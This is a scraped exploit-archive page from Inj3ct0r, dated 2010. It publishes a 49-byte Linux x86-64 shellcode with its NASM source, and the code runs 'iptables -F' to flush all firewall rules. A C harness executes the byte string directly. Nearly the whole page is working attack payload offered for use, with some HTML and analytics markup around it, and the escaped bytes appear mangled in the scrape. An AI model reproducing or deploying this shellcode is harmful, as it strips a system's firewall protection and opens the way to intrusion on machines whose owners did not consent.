Home / os / win7

linux/x86-64 execve ("/sbin/iptables", ["/sbi

Posted on 09 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>linux/x86-64 execve (&quot;/sbin/iptables&quot;, [&quot;/sbin/iptables&quot;, &quot;-F&quot;], NULL)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================================= linux/x86-64 execve (&quot;/sbin/iptables&quot;, [&quot;/sbin/iptables&quot;, &quot;-F&quot;], NULL) - 49 bytes ================================================================================= /* Title: Linux/x86-64 - execve(&quot;/sbin/iptables&quot;, [&quot;/sbin/iptables&quot;, &quot;-F&quot;], NULL) - 49 bytes Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt; Date: Fri 09 Jul 2010 03:26:12 PM EEST Source Code (NASM): section .text global _start _start: xor rax, rax push rax push word 0x462d mov rcx, rsp mov rbx, 0x73656c626174ffff shr rbx, 0x10 push rbx mov rbx, 0x70692f6e6962732f push rbx mov rdi, rsp push rax push rcx push rdi mov rsi, rsp ; execve(&quot;/sbin/iptables&quot;, [&quot;/sbin/iptables&quot;, &quot;-F&quot;], NULL); mov al, 0x3b syscall */ #include &lt;stdio.h&gt; char shellcode[] = &quot;x48x31xc0x50x66x68x2dx46x48x89xe1x48xbbxffxff&quot; &quot;x74x61x62x6cx65x73x48xc1xebx10x53x48xbbx2fx73&quot; &quot;x62x69x2fx69x70x53x48x89xe7x50x51x57x48x89xe6&quot; &quot;xb0x3bx0fx05&quot;; int main() { printf(&quot;Length: %d bytes. '&quot;, strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP